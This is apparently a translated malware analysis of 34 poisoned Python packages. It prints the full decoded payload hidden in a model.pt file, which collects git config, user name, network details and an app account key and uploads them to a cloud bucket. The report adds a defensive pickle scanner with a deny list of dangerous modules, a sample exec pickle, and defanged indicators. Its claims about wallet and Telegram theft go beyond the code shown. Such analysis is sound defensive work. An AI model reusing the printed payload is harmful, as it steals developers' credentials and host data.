The poisoned component steals the user's host information, Telegram tokens, Ethereum and Binance Smart Chain wallet funds and other data, and establishes a persistent connection to the attacker's C2 address, through which the attacker can remotely control the user's host and steal further information.
Unpacking and decoding the model.pt file yields the malicious code below (shown after decoding):
# -*- coding: utf-8 -*-
import json
import os
import subprocess
import codecs
import sys
import warnings
warnings.filterwarnings("ignore")
# Python 2/3 compatibility shims for the HTTP client
if sys.version_info[0] >= 3:
    import urllib.request as urllib2
else:
    import urllib2
try:
    from urllib2 import Request, urlopen
except ImportError:
    from urllib.request import Request, urlopen
import uuid

# Exfiltration endpoint: an OSS bucket, with a random hex id per victim
url = "https://aksjdbajkb2jeblad.oss-cn-hongkong.aliyuncs.com/aksahlksd/" + uuid.uuid4().hex

# Collect ~/.gitconfig (git identity, and any credentials stored in it)
try:
    aa = os.path.expanduser("~")
    cc = os.path.join(aa, ".gitconfig")
    with codecs.open(cc, "r", encoding="utf-8", errors="ignore") as f:
        dd = f.read()
    aaa = dd
except Exception as e:
    aaa = "error"

# Current user name
try:
    user = subprocess.check_output("whoami", shell=True).strip().decode("utf-8")
except:
    user = "None"

import subprocess
# macOS only: reads a preference key of the Alibaba Alimeeting app (identifies the account/work context)
try:
    result = subprocess.run(
        "defaults read alibaba.alimeeting _utmc_lui_",
        shell=True, check=True,
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
    )
    dd = result.stdout.strip()
except Exception as e:
    dd = "None"

# Network interface configuration
if sys.platform == "win32":
    ccc = "ipconfig"
else:
    ccc = "ifconfig"
try:
    bb = subprocess.check_output(ccc, shell=True).decode("utf-8")
except:
    bb = "None"

json_data = {
    "user": user,
    "work": dd,
    "interface_info": bb,
    "gitconfig_info": aaa
}
url_ = url + "-" + str(dd)

# Upload the collected data with an HTTP PUT
if sys.version_info[0] >= 3:
    req = Request(url_, data=json.dumps(json_data).encode('utf-8'),
                  headers={'Content-Type': 'application/json'}, method='PUT')
else:
    class PutRequest(urllib2.Request):
        def get_method(self):
            return 'PUT'
    req = PutRequest(url_, data=json.dumps(json_data).encode('utf-8'))
    req.add_header('Content-Type', 'application/json')
try:
    response = urlopen(req)
except Exception as e:
    pass
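The payload above was hidden in a model.pt file, which in the torch.save() layout is a zip archive whose data.pkl member is a Python pickle; loading such a file runs whatever the pickle's GLOBAL/REDUCE opcodes reference. The following scanner is an added defender-side example, not code from the original article or from the poisoned packages: it disassembles the pickle with pickletools (nothing is unpickled) and reports imports from modules that have no business in model weights. The zip layout, the suspicious-module list and all sample inputs are assumptions constructed for the example.

```python
import io
import pickle
import pickletools
import subprocess   # only used to build a reference sample below; nothing is executed
import zipfile

# Modules whose appearance in a model pickle is a strong sign of an executable payload.
# torch.save() output legitimately references torch.*, collections.* and numpy.*, which are not listed.
SUSPICIOUS_MODULES = {
    "builtins", "__builtin__", "os", "posix", "nt", "subprocess", "sys", "codecs",
    "base64", "marshal", "zlib", "socket", "urllib", "urllib2", "runpy",
    "importlib", "shutil", "pty", "ctypes",
}
STRING_OPCODES = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


def globals_in_pickle(data: bytes):
    """List the (module, name) pairs a pickle would import, by walking its opcodes.
    pickletools.genops only disassembles; nothing in the stream is executed."""
    found = []
    recent_strings = []  # STACK_GLOBAL (protocol 4+) takes module and name from the two preceding string pushes
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":          # protocols 0-3: "module name" as one text argument
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2:
                found.append((recent_strings[-2], recent_strings[-1]))
        elif opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
    return found


def suspicious_globals(data: bytes):
    """Keep only imports from modules on the deny list (top-level package is what counts)."""
    return [(m, n) for m, n in globals_in_pickle(data)
            if m.split(".")[0] in SUSPICIOUS_MODULES]


def scan_model_file(data: bytes):
    """Scan a model file. A torch.save() zip has its pickle in */data.pkl; a bare pickle is also accepted.
    Returns {member_name: [suspicious (module, name) pairs]}; an empty list means nothing was flagged."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        report = {}
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                if member.endswith(".pkl"):
                    report[member] = suspicious_globals(zf.read(member))
        return report
    return {"<raw pickle>": suspicious_globals(data)}


def _make_archive(members):
    """Build an in-memory zip in the torch.save() layout from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples; none of this is the real poisoned package.
BENIGN_MODEL = _make_archive({"model/data.pkl": pickle.dumps({"weights": [0.1, 0.2]}),
                              "model/version": b"3\n"})
# Hand-written protocol-0 pickle: GLOBAL builtins.exec followed by REDUCE on a string argument.
# Loading it would call exec(); this scanner only disassembles it.
PAYLOAD_PICKLE = b"cbuiltins\nexec\n(Vprint('payload')\ntR."
MALICIOUS_MODEL = _make_archive({"model/data.pkl": PAYLOAD_PICKLE, "model/version": b"3\n"})
# Protocol-4 pickle referencing a function by name (exercises the STACK_GLOBAL path); dumps() does not call it.
REFERENCE_PICKLE = pickle.dumps(subprocess.check_output, protocol=4)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_MODEL), ("malicious", MALICIOUS_MODEL)):
        print(label, scan_model_file(blob))
```

Run the scanner over a downloaded model before it is ever passed to torch.load(); a non-empty list for any member is reason to quarantine the file. The deny list is deliberately short and a real deployment would rather allow-list the torch/numpy/collections globals it expects and flag everything else.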
Domains:
hxxps://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev
hxxps://aksjdbajkb2jeblad.oss-cn-hongkong.aliyuncs[.]com
IP addresses:
89[.]110.96.251
89[.]110.93.132
84[.]54.44.100
Email:
cappership[.]me
Originally published on the WeChat public account KeepHack1ng: "aliyun-ai-labs-snippets-sdk and 33 other poisoned packages (34 in total) steal users' sensitive information".